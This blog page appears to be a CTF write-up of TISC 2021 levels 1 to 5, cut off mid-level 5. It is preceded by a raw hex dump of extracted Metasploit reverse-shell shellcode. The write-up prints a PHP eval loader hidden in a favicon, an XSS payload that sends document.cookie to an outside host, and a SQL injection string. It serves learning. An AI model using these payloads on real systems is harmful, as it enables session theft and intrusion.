The dBase vulnerability was an accidental find that surfaced from the depths of computing history. (Un)surpisingly, a thirty-year-old format continues to cause problems in modern applications. Even though the Borland Database Engine was deprecated decades ago, some software manufacturers continue to package it as a dependency, exposing users to old vulnerabilities. The engine is no longer updated and should not be used in software.

For me, it was a useful opportunity to take one step beyond foundational memory corruption skills by exploiting a write-what-where gadget to achieve code execution. It also demonstrated the power of black-box coverage-guided fuzzing in a vulnerability research workflow. I hope this sharing proves useful for other beginners.

Imposter Alert: Extracting and Reversing Metasploit Payloads (Flare-On 2020 Challenge 7)

25 October 2021 at 08:03
Rr(J1a|, RWRJLxHQY I:I41 8u};}$uXX$fKXD$$[[aYZQ__Z]h32hws2_ThLw)TPh)kPPPP@P@PhjhDh\jVWhtatNuhVjjVWh_6KXORj@hQjhXSSVPjVSWh_)u[Y]UWkillervulture123^1u1u10UEIu_Q FCE8820000006089E531C0648B50308B520C8B52148B72280FB74A2631FFAC3C617C022C20C1CF0D01C7E2F252578B52108B4A3C8B4C1178E34801D1518B592001D38B4918E33A498B348B01D631FFACC1CF0D01C738E075F6037DF83B7D2475E4588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE05F5F5A8B12EB8D5D6833320000687773325F54684C772607FFD5B89001000029C454506829806B00FFD5505050504050405068EA0FDFE0FFD5976A0568C0A84415680200115C89E66A1056576899A57461FFD585C0740CFF4E0875EC68F0B5A256FFD56A006A0456576802D9C85FFFD58B3681F64B584F528D0E6A406800100000516A006858A453E5FFD58D98000100005356506A005653576802D9C85FFFD501C329C675EE5B595D555789DFE8100000006B696C6C657276756C747572653132335E31C0AAFEC075FB81EF0001000031DB021C0789C280E20F021C168A140786141F881407FEC075E831DBFEC0021C078A140786141F88140702141F8A1417305500454975E55FC351

The InfoSecurity Challenge 2021 Full Writeup: Battle Royale for $30k

26 November 2021 at 03:32

Introduction

From 29 October to 14 November 2021, the Centre for Strategic Infocomm Technologies (CSIT) ran The InfoSecurity Challenge (TISC), an individual competition consisting of 10 levels that tested participants' cybersecurity and programming skills. This format created a big departure from last year's iteration (you can read my writeup here), which was a timed 48 hour challenge focused primarily on reverse engineering and binary exploitation.

Now with two weeks and 10 levels, the difficulty and variety of the challenges greatly increased. As you would expect, the prize pool grew accordingly – instead of $3,000 in vouchers in 2020, it was now $30,000 in cold hard cash. Participants unlocked the prize money in increments of $10,000 from level 8 to 10, with successful solvers splitting the pool equally. For example, if there was only one solver for level 10, they would claim the full $10,000 for themselves.

Hmm... why does this sound so familiar?

Squid Game Piggy Bank

However, since I was playing for charity, I was more interested in testing my skills, particularly in the binary exploitation domain. I placed 6th in the previous TISC and wanted to see what difference a year of learning had made.

I spent more than a hundred hours cracking my head against seemingly impossible tasks ranging from web, mobile, steganography, binary exploitation, custom shellcoding, cryptography and more. Levels 8 to 10 combined multiple domains and each one felt like a mini-CTF. While I considered myself reasonably proficient in web, I stepped way out of my comfort zone tackling the broad array of domains, especially as an absolute beginner in pwn, forensics, and steganography. Since I could only unlock each level by completing the previous one, I forced myself to learn new techniques every time.

I took away important lessons for both CTFs and day-to-day red teaming that I hope others will find useful as well. What distinguished TISC from typical CTFs was its dual emphasis on hacking AND programming – rather than exploiting a single vulnerability, I often needed to automate exploits thousands of times. You'll see what I mean soon.

Let's dive into the challenges. You may want to skip the earlier levels as they were fairly basic. You should definitely read levels 8-10, but honestly every challenge from level 3 onwards is interesting.

Level 1: Scratching the Surface

I warmed up on basic forensics and steganography challenges.

Part 1

Domains: Forensics

We've sent the following secret message on a secret channel.

Submit your flag in this format: TISC{decoded message in lower case}

file1.wav

The phrase β€œsecret channel” suggested data smuggling via an audio channel, a common steganography technique. file1.wav played a cheery tune that I could not recognise. I quickly applied common tools and techniques like binwalk as described in this Medium article but found nothing. I even tried XORing both channels:

import wave
import struct

wav = wave.open("file1.wav", mode='rb')
frame_bytes = bytearray(list(wav.readframes(wav.getnframes())))
shorts = struct.unpack('H'*(len(frame_bytes)//2), frame_bytes)

shorts_three = struct.unpack('H'*(len(frame_bytes)//4), frame_bytes)


extracted_left = shorts[::2] 
extracted_right = shorts[1::2]
print(len(extracted_left))
print(len(extracted_right))
extracted_secret = shorts[2::3]
print(len(extracted_secret))


extractedLSB = ""
for i in range(0, len(extracted_left)):
    extractedLSB += str((extracted_left[i] & 1) ^ (extracted_right[i] & 1))
    
string_blocks = (extractedLSB[i:i+8] for i in range(0, len(extractedLSB), 8))
decoded = ''.join(chr(int(char, 2)) for char in string_blocks)
print(decoded[0:500])
wav.close()

Slightly panicking at this simple challenge, I returned to the β€œsecret channel” hint. I separated each audio channel from the file with a command from Stack Overflow: ffmpeg -i file1.wav -map_channel 0.0.0 ch0.wav -map_channel 0.0.1 ch1.wav. I played ch1.wav and instead of funky music, I heard a series of beeps – Morse code! I used an online Morse Code audio decoder and got the flag.

TISC{csitislocatedinsciencepark}

Part 2

Domains: Forensics

This is a generic picture. What is the modify time of this photograph?

Submit your flag in the following format: TISC{YYYY:MM:DD HH:MM:SS}

file2.jpg

exiftool solved this in no time.

TISC{2021:10:30 03:40:49}

Part 3

Domains: Forensics, Cryptography

Nothing unusual about the Singapore logo right?

Submit your flag in the following format: TISC{ANSWER}

file3.jpg

The first appearance of the cryptography domain! I opened the file in the 010 Editor hex editor which highlighted an anomalous data blob at the end of the file.

file3.jpg Hex Bytes

The PK magic bytes identified this blob as a zip file. I extracted it with binwalk -e file3.jpg which revealed another image file picture_with_text.jpg. I opened it in 010 Editor and spotted some garbage bytes at the start of the file.

picture_with_text.jpg Hex Bytes

NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE looked like a simple text cipher. I popped into CyberChef and quickly discovered that it was ROT13 β€œencryption”.

TISC{APPLECARROTPEAR}

Part 4

Domains: Forensics

Excellent! Now that you have show your capabilities, CSIT SOC team have given you an .OVA virtual image in investigating a snapshot of a machine that has been compromised by PALINDROME. What can you uncover from the image?

Once you download the VM, use this free flag TISC{Yes, I've got this.} to unlock challenge 4 – 10.

https://transfer.ttyusb.dev/I6aQoOSuUuAoIIaqMWWkCcKyOk/windows10.ova

Check MD5 hash: c5b401cce9a07a37a6571ebe5d4c0a48

For guide on how to import the ova file into VirtualBox, please follow the VM importing guide attached.

Please download and install Virtualbox ver 6.1.26 instead of ver 6.1.28, as there has been reports of errors when trying to install the Win 10 VM image.

This challenge contained six flags but no rollercoasters. I naively imported the VM into Virtualbox and got to work.

What is the name of the user?

Submit your flag in the format: TISC{name}.

What is whoami?

TISC{adam}

Which time was the user's most recent logon? Convert it UTC before submitting.

Submit your flag in the UTC format: TISC{DD/MM/YYYY HH:MM:SS}.

I experienced my first facepalm moment of the competition (there would be many more to come). The most recent logon time got reset after I logged into the VM, so it was time to download Autopsy.

After Autopsy imported and processed the OVA file, I found the most recent logon time under OS Accounts > adam > Last Login and converted the timezone to UTC.

TISC{17/06/2021 02:41:37}.

A 7z archive was deleted, what is the value of the file CRC32 hash that is inside the 7z archive?

Submit your flag in this format: TISC{CRC32 hash in upper case}.

I found the deleted archive at Data Artifacts > Recycle Bin and generated the CRC32 hash with 7-Zip.

TISC{040E23DA}

Question1: How many users have an RID of 1000 or above on the machine?

Question2: What is the account name for RID of 501?

Question3: What is the account name for RID of 503?

Submit your flag in this format: TISC{Answer1-Answer2-Answer3}. Use the same case for the Answers as you found them.

I got all of the answers under OS Accounts although I was briefly confused by the system users.

TISC{1-Guest-DefaultAccount}

Question1: How many times did the user visit https://www.csit.gov.sg/about-csit/who-we-are ?

Question2: How many times did the user visit https://www.facebook.com ?

Question3: How many times did the user visit https://www.live.com ?

Submit your flag in this format: TISC{ANSWER1-ANSWER2-ANSWER3}.

Data Artifacts > Web History

TISC{2-0-0}

A device with the drive letter β€œZ” was connected as a shared folder in VirtualBox. What was the label of the volume? Perhaps the registry can tell us the β€œconnected” drive?

Submit your flag in this format: TISC{label of volume}.

I found this a little difficult. I resorted to adding another shared folder to the VM then searching for the label name in Registry Editor to figure out which registry key controlled the volume labels. This led me to the registry path Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 which contained all the volume labels.

TISC{vm-shared}

A file with SHA1 0D97DBDBA2D35C37F434538E4DFAA06FCCC18A13 is in the VM… somewhere. What is the original name of the file that is of interest?

Submit your flag in this format: TISC{original name of file with correct file extension}.

Since Autopsy only supported SHA256 and MD5 hashes, I resorted to guessing that it was one of the files under Data Artifacts > Recent Documents. I extracted all of them and ran Get-FileHash -Algorithm SHA1 *. otter-singapore.lnk, which used to point to otter-singapore.jpg, matched the SHA1 hash.

TISC{otter-singapore.jpg}

Level 2: Dee Na Saw as a need

Domain: Network Forensics

We have detected and captured a stream of anomalous DNS network traffic sent out from one of the PALINDROME compromised servers. None of the domain names found are active. Either PALINDROME had shut them down or there's more to it than it seems.

This level contains 2 flags and both flags can be found independently from the same pcap file as attached here.

Flag 1 will be in this format, TISC{16 characters}.

Flag 2 will be in this format, TISC{17 characters}.

traffic.pcap

As a newbie to steganography, I felt that this level was the most β€œCTF-y” and actually got stuck for two days hunting flag 1 and ragequit for a while. Fortunately, I managed to get it after cooling off.

Flag 2

traffic.pcap consisted of a short series of DNS query responses.

file3.jpg Hex Bytes

A few anomalies stood out to me:

  1. The domain names clearly contained some kind of exfiltration data and matched the format d33d<9 hex chars>.toptenspot.net.
  2. The Time to Live (TTL) values constantly changed, which should not be the case with a typical DNS server.
  3. The serial numbers also kept changing.

For the domain names, I noticed that the first two hex chars were always numeric e.g. 10, 11, 12. I extracted the hex chars with scapy and tried hex-decoding them but it only produced gibberish. After fiddling around with a few variations such as XORing consecutive bytes, I came across this CTF writeup that described Base32 encoding of data in DNS query names. Base32 encoding used a similar charset as hex numbers. I tried Base32 decoding the β€œhex chars” with CyberChef and immediately spotted a few interesting outputs such as <NON-ASCII CHARS>ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghij. After playing around with the offsets, I realised that the first two (numeric) characters were bad bytes, while the rest of the characters made up a valid base32 string.

I automated the decoding routine with a quick script.

from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')
encoded = ''

for packet in dns_packets:
    if packet.haslayer(DNS):
        encoded += packet[DNS].qd.qname[6:13].decode('utf-8')

decoded = base64.b32decode(encoded[:-(len(encoded) % 8)]).decode('utf-8')
print(decoded)

This produced a bunch of lorem ipsum text along with the second flag.

TISC{n3vEr_0dd_0r_Ev3n}

Flag 1

With the first anomalous property solved, I focused on the TTLs and serial numbers, wasting many hours chasing what eventually turned out to be red herring. The TTLs and serial numbers generally matched a pattern – Serial number + TTL = unix timestamp – that made it seem like I was on the right path. After many fruitless hours spent mutating these values in increasingly insane permutations, I gave up and took my break.

When I returned, I went back to basics and considered the numeric β€œbad bytes” from the DNS domain names. I decided to check the range of these values. They went from 01 to 64... could it be? I transposed the numbers to the base64 alphabet, then base64-decoded them... yep, it was a DOCX file.

Pictured below is the moment the challenge creator thought of the TTL red herring.

file3.jpg Hex Bytes

Moving on, I extracted the DOCX file with scapy.

from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
encoded = ''

for packet in dns_packets:
    if packet.haslayer(DNS):
        encoded += alphabet[int(packet[DNS].qd.qname[4:6].decode('utf-8'))-1]

decoded = base64.b64decode(encoded + '==')
file = open('output.docx', 'wb')
file.write(decoded)
file.close()

The word document contained the pretty obvious clue now you see me, what you seek is within. Since DOCX files are actually ZIP files in disguise, I unzipped the DOCX and grepped the files for the flag format TISC{. I found what I was looking for in word/theme/theme1.xml.

TISC{1iv3_n0t_0n_3vi1}

Level 3: Needle in a Greystack

Domains: Reverse Engineering

An attack was detected on an internal network that blocked off all types of executable files. How did this happen?

Upon further investigations, we recovered these 2 grey-scale images. What could they be?

1.bmp

2.bmp

I opened both files in 010 Editor and noticed that both 1.bmp and 2.bmp embedded data in the BMP pixel colour bytes in reverse order. 1.bmp contained a Windows executable while 2.bmp contained simple ASCII text.

1.bmp Hex Bytes

2.bmp Hex Bytes

I extracted them with a simple Python script.

with open("1.bmp", "rb") as bmp_1, open("1.exe", "wb") as out_file:
    data = bmp_1.read()

    output = data[-148:][:-3]
    for i in range(1, 145):
        output += data[-((i + 1) * 148):-(i * 148)][:-3]

    out_file.write(output)

with open("2.bmp", "rb") as bmp_1, open("2.txt", "wb") as out_file:
    data = bmp_1.read()

    output = data[-100:][:-1]
    for i in range(1, 99):
        output += data[-((i + 1) * 100):-(i * 100)][:-1]

    out_file.write(output)

Running 1.exe, I received the following output:

> .\1.exe
HELLO WORLD
flag{THIS_IS_NOT_A_FLAG}

Digging deeper, I decompiled the executable with IDA and noticed that the main function checked for a .txt file in the first argument.

  puts("HELLO WORLD");
  if ( argc < 2 )
    goto LABEL_34;
  v3 = argv[1];
  v4 = strrchr(v3, 46);
  if ( !v4 || v4 == v3 )
    v5 = (const char *)&unk_40575A;
  else
    v5 = v4 + 1;
  v6 = strcmp("txt", v5);
  if ( v6 )
    v6 = v6 < 0 ? -1 : 1;
  if ( v6 )
  {
LABEL_34:
    puts("flag{THIS_IS_NOT_A_FLAG}");
    return 1;
  }
  fopen_s(&Stream, argv[1], "rb");
  v7 = (void (__cdecl *)(FILE *, int, int))fseek;
  if ( Stream )
  {
    fseek(Stream, 0, 2);
    v8 = ftell(Stream);
    v23 = v8 >> 31;
    v24 = v8;
    fclose(Stream);
  }

I tested this with a random text file, which yielded the following output.

> .\1.exe .\2.txt
HELLO WORLD
Almost There!!

Looking further down the pseudocode for main, I noticed that it called a function that VirtualAlloced some memory, copied data into it, then ran LoadLibraryA. Since Almost There!! did not appear as a string in 1.exe, I suspected that it came from the dynamically loaded library.

I set a breakpoint at the memcpy and ran the IDA debugger. Checking the arguments to memcpy at the breakpoint, I confirmed that it copied an executable file that included the magic bytes MZ followed by This program cannot be run in DOS mode.

IDA Debugger 1.exe

Now I needed to dump this data. I manually figured out the size of the file by checking for the Application Manifest XML text that appeared at the end of the source buffer. Next, I dumped it in WinDBG with .writemem b.exe ebx L2600.

The executable turned out to be a DLL that contained the decoding routine in the dllmain_dispatch function, which was executed every time 1.exe loaded it with LoadLibraryA.

The DLL decompiled to pseudocode which I identified as the RC4 key-scheduling algorithm (KSA) due to the 256-iteration loop.

if ( Block )
    {
    v4 = strcmp(Block, "Words of the wise may open many locks in life.");
    if ( v4 )
        v4 = v4 < 0 ? -1 : 1;
    if ( !v4 )
        puts("*Wink wink*");
    }
    memset(v18, 0, 0xFFu);
    for ( i = 0; i < 256; ++i )           // RC4 Key Scheduling Algorithm
    *((_BYTE *)&Stream[1] + i) = i;
    v6 = 0;
    Stream[0] = 0;
    do
    {
    v7 = *((_BYTE *)&Stream[1] + v6);
    v8 = (FILE *)(unsigned __int8)(LOBYTE(Stream[0]) + Block[v6 % 0xEu] + v7);
    Stream[0] = v8;
    *((_BYTE *)&Stream[1] + v6++) = *((_BYTE *)&Stream[1] + (_DWORD)v8);
    *((_BYTE *)&Stream[1] + (_DWORD)v8) = v7;
    }

The pseudocode contained two more important tidbits of information. Firstly, β€œWords of the wise may open many locks in life” looked like a hint. Secondly, The KSA loop used 0xE as the modulus, telling me that the RC4 key was 14 bytes long.

At first, I fell down a rabbit hole trying to guess the key. Given the name of the challenge and Words of the wise, I thought it had something to do with Gandalf from Lord of the Rings and tried all kinds of phrases associated with him, including youwillnotpass. After a long time, I returned to my senses and realised that the key probably existed in the second file I had extracted earlier. It contained a huge list of words, including rubywise – this was probably what the β€œWords of the wise” hint was referring to.

I brute forced the keys with a quick Python script.

import subprocess
import os

with open('keys.txt') as file:
    lines = file.readlines()
    lines = [line.rstrip() for line in lines]
    for line in lines:
        with open('key.txt', 'w') as key:
            key.write(line)
        result = subprocess.run([".\\1.exe", ".\\2.txt"], capture_output=True).stdout
        if b'TISC' in result:
            print(line)
            print(result)

TISC{21232f297a57a5a743894a0e4a801fc3}

Level 4: The Magician's Den

Domains: Web Pentesting

One day, the admin of Apple Story Pte Ltd received an anonymous email.

===

Dear admins of Apple Story,

We are PALINDROME.

We have took control over your system and stolen your secret formula!

Do not fear for we are only after the money.

Pay us our demand and we will be gone.

For starters, we have denied all controls from you.

We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 dec 2021.

Do not contact the police or seek for help.

Failure to do so and the plant is gone.

We planted a monitoring kit so do not test us.

Remember 1 BTC by 31 dec 2021 and we will be gone.

Muahahahaha.

Regards,

PALINDROME

===

Management have just one instruction. Retrieve the encryption key before the deadline and solve this.

http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719

Note: Payloads uploaded will be deleted every 30 minutes.

Finally, a web challenge! The website featured a ransom note and a link to a payment page.

Hacked Page

The challenge came with a free hint: β€œWhat are some iconic techniques that the actor PALINDROME mimicked Magecart to evade detection?” Based on this, I researched Magecart's tactics, techniques, and procedures (TTPs) and found out that the threat actor hid malicious payloads in image files. I checked each of the loaded images and noticed that favicon.ico contained the following PHP code: eval(base64_decode('JGNoPWN1cmxfaW5pdCgpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VSTCwiaHR0cDovL3MwcHE2c2xmYXVud2J0bXlzZzYyeXptb2RkYXc3cHBqLmN0Zi5zZzoxODkyNi94Y3Zsb3N4Z2J0ZmNvZm92eXdieGRhd3JlZ2pienF0YS5waHAiKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9QT1NULDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1BPU1RGSUVMRFMsIjE0YzRiMDZiODI0ZWM1OTMyMzkzNjI1MTdmNTM4YjI5PUhpJTIwZnJvbSUyMHNjYWRhIik7JHNlcnZlcl9vdXRwdXQ9Y3VybF9leGVjKCRjaCk7'));. The base64 string decoded to:

$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://<DOMAIN>:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);

This PHP code sent the following HTTP request:

POST /xcvlosxgbtfcofovywbxdawregjbzqta.php HTTP/1.1
Host: <DOMAIN>:18926
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

14c4b06b824ec593239362517f538b29=Hi%20from%20scada

Which returned the following response:

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 05:50:11 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.2
Vary: Accept-Encoding
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8

New record created successfully in data/9bcd278b611772b366155e078d529145.html

The server created a HTML file from my input. I did a quick check for SQL injection (nothing), then moved on the next most likely vulnerability – a blind cross-site scripting (XSS) attack. Instead of Hi%20from%20scada, I entered <img src="http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net" />. After a few minutes, I got a pingback!

GET / HTTP/1.1
Referer: http://magicians-den-web/data/9bcd278b611772b366155e078d529145.html
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net

I also realised that the PHP code sent the POST request to a different website at http://<DOMAIN>:18926/. The website included a β€œLatest sample data” page containing the HTML files created by the POST request, which helped me debug my payloads.

Sample Data Page

Usually, XSS CTF challenges featured data exfiltration via the victim's browser. At first, I suspected that because the victim's User Agent PhantomJS/2.1.1 suffered from a known local file disclosure vulnerability, I was meant to leak /etc/passwd. However, after multiple attempts, I got nowhere, probably because the vicitm accessed the XSS payload from a http:// URL rather than a file:// URI that could bypass Cross-Origin Resource Sharing (CORS) protections.

Going back to the drawing board, I decided to perform some directory busting with ffuf and discovered that a login page existed at http://<DOMAIN>:18926/login.php.

Login Page

Unfortunately, the signup was disabled, but since the PHPSESSID cookie controlled the user's session, I found the way forward: I needed to leak the admin's session cookie using the blind XSS. I modified my payload to <script>document.body.appendChild(document.createElement("img")).src='http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net?'%2bdocument.cookie</script> and received a pingback at /?PHPSESSID=64f15ffeb7a191812bddfb9a855e0ffb.

After adding the session cookie, I browsed to the login page and got redirected to http://<DOMAIN>:18926/landing_admin.php.

Landing Admin Page

The page listed actions taken by targets and allowed me to filter the results by isALIVE or isDEAD. When I changed the filter, the page sent the following HTTP request:

POST /landing_admin.php HTTP/1.1
Host: <DOMAIN>:18926
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<DOMAIN>:18926
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<DOMAIN>:18926/landing_admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=e9b94a5a71d62d9171130ad5890f38ef
Connection: close

filter=isALIVE

Other than the filtered actions, the response included the text Filter applied: <VALUE OF FILTER PARAM>. Switching to the isDEAD filter returned the actions MaybeMessingAroundTheFilterWillHelp? and ButDoYouKnowHow?, hinting at an SQL injection.

I confirmed that the POST /landing_admin.php request was vulnerable to SQL injection using isomorphic SQL statements; adding a simple ' to filter=isALIVE caused the server to omit the Filter applied message and adding '' restored it. However, jumping straight to ' OR '1'='1 failed. Puzzled, I continued testing several payloads and eventually noticed that certain characters were sanitized because they never appeared in the Filter applied message. By fuzzing all possible URL-encoded ASCII characters, I reconstructed the blacklist !"$%&*+,-./:;<=>?@[]^_`{|}~, which only left the special characters #'(). Additionally, I found out that any filter parameter longer than 7 characters always failed.

Since the injected SQL statement probably looked something like SELECT * from actions WHERE status='<PAYLOAD>', I reasoned that one possible valid payload was 'OR(1)#, creating the final statement SELECT * from actions WHERE status=''OR(1)#'. This neatly dumped all possible actions while commenting out the extra '. Thankfully, the payload worked and the response included the flag as one of the actions.

TISC{H0P3_YOu_eNJ0Y-1t}

Level 5: Need for Speed

Domains: Binary Manipulation, IoT Analytics

We have intercepted some instructions sent to an autonomous bomb truck used by PALINDROME. However, it seems to be just a BMP file of a route to the Istana!

Analyze the file provided and uncover PALINDROME's instructions. Find a way to kill the operation before it is too late.

Ensure the md5 checksum of the given file matches the following before starting: 26dc6d1a8659594cdd6e504327c55799

Submit your flag in the format: TISC{flag found}.

Note: The flag found in this challenge is not in the TISC{...} format. To assist in verifying if you have obtained the flag, the md5 checksum of the flag is: d6808584f9f72d12096a9ca865924799.

ATTACHED FILES

route.bmp

This steganography challenge stumped many participants. On the surface, route.bmp looked like a simple screenshot of a map.

route.bmp

Using stegsolve, I noticed interesting outputs when I applied the plane 0 filter on either red, green, or blue values.

Stegsolve

The top half of the image resembled static instead of the expected black and white outline of the original image. While researching more image steganography techniques, I came across another CTF writeup which featured a similar β€œstatic” generated by stegsolve. The writeup described how the image hid the data in the least significant bytes of each pixel's RGB values. I applied the script from the writeup to extract the data but encountered a slight corruption. Although the first few bytes 37 7A C2 BC C2 AF 27 1C almost matched the magic bytes of a 7-Zip file 37 7A BC AF 27 1C, the extra C2 bytes got in the way of a proper decoding.

I decided to compare the expected binary output against the real output of the script.

Expected: 00110111 01111010 10111100 10101111 00100111 00011100     # 37 7A BC AF 27 1C
Real:     00110111001111011010001011100010000111101011010011100     # 37 3d a2 e2 1e b4 1c

After reading the writeup closely, I realised that the script correctly skipped every 9th bit but converted the bits to bytes too early. I fixed this bug to get a working decoder.

##!/usr/bin/env python
from PIL import Image
import sys

## Trim every 9th bit
def trim_bit_9(b):
    trimmed = ''
    while len(b) != 0:
        trimmed += b[:8]
        b = b[9:]
    return trimmed

## Load image data
img = Image.open(sys.argv[1])
w,h = img.size
pixels = img.load()

binary = ''
for y in range(h):
    for x in range(w):
        # Pull out the LSBs of this pixel in RGB order
        binary += ''.join([str(n & 1) for n in pixels[x, y]])

trimmed = trim_bit_9(binary)
with open('out.7z', 'wb') as file:
    file.write(bytes(int(trimmed[i : i + 8], 2) for i in range(0, len(trimmed), 8)))

The extracted 7-Zip file contained two files: update.log and candump.log.

updated.log contained the following text:

see turn signals for updated abort code :)
- P4lindr0me

Meanwhile, candump.log was a huge file that contained lines like this:

(1623740188.969099) vcan0 136#000200000000002A
(1623740188.969107) vcan0 13A#0000000000000028
(1623740188.969109) vcan0 13F#000000050000002E
(1623740188.969112) vcan0 17C#0000000010000021
(1623740225.790964) vcan0 324#7465000000000E1A
(1623740225.790966) vcan0 37C#FD00FD00097F001A
(1623740225.790968) vcan0 039#0039
(1623740225.792217) vcan0 183#0000000C0000102D
(1623740225.792231) vcan0 143#6B6B00E0
(1623740225.794607) vcan0 095#800007F400000017

What was I looking at? After a bit of Googling, I found out that candump was a tool to dump Controller Area Network (CAN) bus traffic. CAN itself was a network protocol used by vehicles. By searching for some of the lines in candump.log, I discovered a sample CAN log generated by ICSim. After doing some more research on the CAN protocol, I deduced that each line in the CAN dump matched the format (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>.

Based on the β€œsee turn signals” clue, I needed to find the CAN instruction ID that matched the β€œturn signal” instruction. The CAN instruction data for turn signals probably contained the flag. I reviewed the source code of ICSim and saw that ICSim set the turn signal ID to either a default constant or some randomised value:

##define DEFAULT_SIGNAL_ID 392 // 0x188
...
  signal_id = DEFAULT_SIGNAL_ID;
  speed_id = DEFAULT_SPEED_ID;

  if (randomize || seed) {
	if(randomize) seed = time(NULL);
	srand(seed);
	door_id = (rand() % 2046) + 1;
	signal_id = (rand() % 2046) + 1;

Sadly, since none of the CAN dump lines contained the 188 instruction ID, I knew that the turn signal instruction ID had been randomised.

Based on the code and an ICSim tutorial, I also knew that the data values for the turn signal instruction could be 00 (both off), 01 (left on only), 02 (right on only), or 03 (both on). As such, I attempted to filter out all CAN instruction IDs that had at most 4 unique data values in candump.log. The instruction ID 40C looked promising because it only had the following unique data values: 40C: ['0000000004000013', '014A484D46413325', '0236323239533039', '033133383439000D']. However, despite spending hours hex-decoding the values, XORing them, and so on, I failed to retrieve any usable data.

After wasting many time on this rabbit hole, I re-read the source code for sending a turn signal on ICSim.

void send_turn_signal() {
	memset(&cf, 0, sizeof(cf));
	cf.can_id = signal_id;
	cf.len = signal_len;
	cf.data[signal_pos] = signal_state;
	if(signal_pos) randomize_pkt(0, signal_pos);
	if(signal_len != signal_pos + 1) randomize_pkt(signal_pos+1, signal_len);
	send_pkt(CAN_MTU);
}

I noticed my mistake: the send_turn_signal function set only one byte in the CAN message data to the signal state byte, then randomised the rest of the data bytes. This meant that the turn signals would have far more than four possible unique data values! Instead, I should have filtered the CAN dump for turn signal IDs whose data values always included either 00, 01, 02, and 03 in a fixed position. I quick wrote a new script to do this.

can_combinations = dict()
can_count = dict()

with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id not in can_combinations:
            can_combinations[can_id] = [can_data]
        else:
            if can_data not in can_combinations[can_id]:
                can_combinations[can_id].append(can_data)
        if can_id not in can_count:
            can_count[can_id] = 1
        else:
            can_count[can_id] += 1

for can_id in can_combinations:
    if all(('01' in data or '02' in data or '03' in data or '00' in data) for data in can_combinations[can_id]):
        print("{} {}: {}".format(can_id, can_count[can_id], can_combinations[can_id]))

Out of the possible filtered CAN IDs, 0C7 also looked promising because some of the data values contained ASCII characters when hex-decoded.

0C7: ['00006c88000000', '0E003100000011', '00006664000000', '00003369000066', '00E75f00D30000', '3A0931E20000E0', '07003500000000', '00005fA1000038', '00007782600000', '3521683F00016C', '00003400000005', '00003700000100', '4F005f00000000', '00006802000100', '00003483000000', 'B900702D000100', '00007006000000', '00B63300000117', 'F8786e000C00D6', '0092359B000100', '90005f77F80000', 'B3457700000100', '00006800000030', 'C9F13300AA0100', '00B56e00000000', '00005f98AB0186', '770079003800D0', '0000305D000100', 'F3427500000064', '00002700000100', 'A0007200460032', '00003312000100', 'C2005f000000E2', '00006200790100', '00007500000000', '00003500000000', '004A7900000000', '00005f00000000', '00006d33000000', '000034000000BF', '00136b0000005C', '00F63100000000', '00006e00AA0099', '15003600000000', '7B005fD6000000', 'BC003020000000', 'B7003700000000', '0000680000006C', '00003300310000', '50007200A50000', '00005f00A60000', '00E67000A200A2', '77006c00450059', '89003400000000', '59006e2AE500D1', '00E23500F80000', '00912eC2B40000', '00002d00000100', '003E6a007B0060', '00005f00F70132', '0000304F000000', '00FB5f00000100', '44576800000000', '00005f00000193', 'FD006eDE450000', '00895f00900100', '00006c00910000', '00005fDDD10000', '00003300000200', '00CA5f00CC0000', 'E4FB6e00000000', '00005f00770000', '00006e00000000', '00005f00810000', '00003049940000', '00F95f003600D4', 